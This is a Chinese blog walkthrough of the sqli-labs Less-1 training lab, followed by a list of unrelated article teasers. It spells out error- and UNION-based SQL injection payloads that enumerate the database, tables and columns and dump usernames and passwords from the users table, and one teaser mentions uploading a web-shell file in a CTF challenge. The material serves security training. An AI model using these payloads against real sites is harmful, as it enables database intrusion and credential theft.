sql注入之sqli-labs-less-1 錯誤注入

sql注入之sqli-labs-less-1 錯誤注入

news/2025/7/22 2:01:00/文章來源:https://blog.csdn.net/qq_27249127/article/details/136432840

輸入?id=1 得到登錄頁面：

通過order by 函數試探：

5的時候報錯

試探到3 的時候返回正確的值：

然后繼續注入：?id= -1 ' union? select 1,2,3 --+ 查看回顯點：

開始查看數據庫內容：id=-1' union select 1,database(),3 --+

得到當前數據庫是security

查詢數據庫里面的表內容：

id=-1%27%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database()%20--+

查詢表里面的列名：

?id=-1 'union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'%20--+

查詢字段詳細內容：payload:

?-d=-1' union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)from users %20--+

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/716591.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/716591.shtml
英文地址，請注明出處：http://en.pswp.cn/news/716591.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！

相關文章

OpenXR 超詳細的spec--API初始化介紹

OpenXR 超詳細的spec--API初始化介紹

3.API 初始化 3.2 Function Pointers XrResult xrGetInstanceProcAddr(XrInstance instance,const char* name,PFN_xrVoidFunction* function); instance: XrInstance類型&#…

閱讀更多...

open-spider開源爬蟲工具：抖音數據采集

open-spider開源爬蟲工具：抖音數據采集

在當今信息爆炸的時代，網絡爬蟲作為一種自動化的數據收集工具，其重要性不言而喻。它能夠幫助我們從互聯網上高效地提取和處理數據，為數據分析、市場研究、內容監控等領域提供支持。抖音作為一個全球性的短視頻平臺，擁有海量的用戶…

閱讀更多...

CKA考生注意：這些Deployment要點能助你一臂之力！

CKA考生注意：這些Deployment要點能助你一臂之力！

往期精彩文章 : 提升CKA考試勝算：一文帶你全面了解RBAC權限控制！揭秘高效運維：如何用kubectl top命令實時監控K8s資源使用情況？CKA認證必備：掌握k8s網絡策略的關鍵要點提高CKA認證成功率，CKA真題中的節點維…

閱讀更多...

68-解構賦值，迭代器，生成器函數

68-解構賦值，迭代器，生成器函數

1.解構賦值(針對數組array，字符串String及對象object以) 結構賦值是一種特殊的語法，通過將各種結構中的元素復制到變量中達到"解構"的目的，但是數組本身沒有改變 1.1解構單層數組 <script>let arr [1,2,3,4,5];//獲取數組…

閱讀更多...

c++ primer學習筆記（一）

c++ primer學習筆記（一）

目錄第一章、c快速入門重點：類的簡介第二章 1、基本內置類型 2、字面值常量 1、整型字面值規則 2、浮點字面值規則 3、布爾字面值 4、字符字面值 5、非打印字符的轉義序列 ?編輯 6、字符串字面值 3、變量 1、變量標識符 2、定義和初始化對象 3、…

閱讀更多...

leetcode 1328.破壞回文串

leetcode 1328.破壞回文串

題目鏈接LeetCode1328 1.題目給你一個由小寫英文字母組成的回文字符串 palindrome ，請你將其中一個字符用任意小寫英文字母替換，使得結果字符串的字典序最小 ，且不是回文串。請你返回結果字符串。如果無法做到，則返回一個…

閱讀更多...

java: 無法訪問org.springframework.web.bind.annotation.RequestMapping......類文件具有錯誤的版本 61.0, 應為 52.0

java: 無法訪問org.springframework.web.bind.annotation.RequestMapping......類文件具有錯誤的版本 61.0, 應為 52.0

文章目錄一、報錯問題二、問題背景三、原因分析四、解決方案一、報錯問題 java: 無法訪問org.springframework.web.bind.annotation.RequestMapping 錯誤的類文件: /D:/SoftwareInstall/Maven/repository/org/springframework/spring-web/6.0.9/spring-web-6.0.9.jar!/org/s…

閱讀更多...

$latex報錯Repeated entry解決辦法$

latex報錯Repeated entry解決辦法

報錯原因——重復了兩個參考文獻，刪掉一個即可總結 "Repeated entry"這個錯誤通常出現在你嘗試在LaTeX中多次使用同一個標簽（label）或者多次插入相同的圖像/表格等時。例如，在LaTeX中，我們可能會為每一個章…

閱讀更多...

Modern C++ std::any為何要求Tp可拷貝構造？

Modern C++ std::any為何要求Tp可拷貝構造？

小問題也會影響設計的思路，某個問題或某種case的探討有助于理解設計的初衷。聲明：以下_Tp/Tp都是指要放入std::any的對象的類型。它要求_Tp is_copy_constructible, 僅僅是因為有很多函數的實現調用了Tp的拷貝構造函數嗎？比如說上節提到的初…

閱讀更多...

動態SQL的處理

動態SQL的處理

學習視頻：3001 動態SQL中的元素_嗶哩嗶哩_bilibili 目錄 1.1為什么學 1.2動態SQL中的元素條件查詢操作 if 元素 choose、when、otherwise元素 where、trim元素更新操作 set元素使用場景復雜查詢操作 foreach 元素中的屬性 ?編輯迭代數組迭代List 迭代Map 1…

閱讀更多...

代碼隨想錄算法訓練營第二十七天|LeetCode93 復原IP地址、LeetCode78 子集、LeetCode90 子集II

代碼隨想錄算法訓練營第二十七天|LeetCode93 復原IP地址、LeetCode78 子集、LeetCode90 子集II

93.復原IP地址思路：要建立一個判斷子字符串是否合法的函數，判斷多種不合法的情況。在回溯函數中，參數除了s,和startindex還需要一個pointNum來記錄句點的數量，當句點的數量等于3時，判斷最后一個子串是否合法&#xf…

閱讀更多...

第3部分原理篇2去中心化數字身份標識符（DID）（4）

第3部分原理篇2去中心化數字身份標識符（DID）（4）

3.2.3. DID解析 3.2.3.1. DID解析參與方圖3-5 DID 解析過程本聰老師：我們之前提到過，DID 解析過程是將 DID 轉換為對應的 DID 文檔。這樣做的目的是驗證 DID 所代表的主體的身份。那么解析過程會涉及哪些概念呢？我們看圖3-，DI…

閱讀更多...

端智能：面向手機計算環境的端云協同AI技術創新

端智能：面向手機計算環境的端云協同AI技術創新

近年來，隨著移動端設備軟硬件能力的進步，移動端的算力有了很大提升，同時面向移動端的機器學習框架和模型輕量化技術越來越成熟，端上的AI能力逐漸進入大眾視野，端智能在電商領域也開始逐步走向規模化應用。通過持續探索…

閱讀更多...

leetcode日記（35）跳躍游戲Ⅱ

leetcode日記（35）跳躍游戲Ⅱ

想了一個晚上，第一個思路是用動態規劃，記錄走到每一個節點需要跳動的最小步數，大致方法是每走到一個節點就遍歷一下前面的全部節點，看看哪個節點可以一部跳到該節點，然后從中選取跳躍步數最小的節點，最后輸…

閱讀更多...

完美解決多個Echarts圖表自適應窗口、父容器寬高，并進行性能優化

完美解決多個Echarts圖表自適應窗口、父容器寬高，并進行性能優化

場景很多時候我們會在繪制echarts圖表時，使用以下方法監聽瀏覽器尺寸變化，讓圖表resize()完成自適應 window.addEventListener(resize, ()>{wordCloudChart.resize() })然后，這種自適應真的足夠周全嘛？有些時候，…

閱讀更多...

多元正態分布（Multivariate Normal Distribution）

多元正態分布（Multivariate Normal Distribution）

多元正態分布（Multivariate Normal Distribution），也稱為多變量高斯分布，是單變量正態分布（高斯分布）在多維空間中的推廣。它是描述位于多維空間中的隨機向量的分布情況的一種概率分布。多元正態分布在統計…

閱讀更多...

基于springboot+vue的城鎮保障性住房管理系統(前后端分離)

基于springboot+vue的城鎮保障性住房管理系統(前后端分離)

博主主頁：貓頭鷹源碼博主簡介：Java領域優質創作者、CSDN博客專家、阿里云專家博主、公司架構師、全網粉絲5萬、專注Java技術領域和畢業設計項目實戰，歡迎高校老師\講師\同行交流合作 ?主要內容：畢業設計(Javaweb項目|小程序|Pyt…

閱讀更多...

練習 3 Web [ACTF2020 新生賽]Upload

練習 3 Web [ACTF2020 新生賽]Upload

[ACTF2020 新生賽]Upload1 中間有上傳文件的地方，試一下一句話木馬 txt 不讓傳txt 另存為tlyjpg，木馬文件上傳成功給出了存放目錄： Upload Success! Look here~ ./uplo4d/06a9d80f64fded1e542a95e6d530c70a.jpg 下一步嘗試改木馬文件后綴…

閱讀更多...

云片 3.1（日常實習）面經

云片 3.1（日常實習）面經

1、什么時候開始學習的前端 2、平常通過哪些方式學習 3、遇到bug怎么解決的 4、元素水平居中 5、display有哪些屬性 6、align-items除了center還有哪些屬性 7、display:none和visibility:hidden區別 8、常用的計量單位有哪些 9、rem和em是相對什么的 10、vw和vh有了解…

閱讀更多...

從頭構建gpt2 基于Transformer

從頭構建gpt2 基于Transformer

從頭構建gpt2 基于Transformer VX關注{曉理紫|小李子}，獲取技術推送信息，如感興趣，請轉發給有需要的同學，謝謝支持！！ 如果你感覺對你有所幫助，請關注我。源碼獲取 VX關注曉理紫并回復“chatgpt…

閱讀更多...

最新文章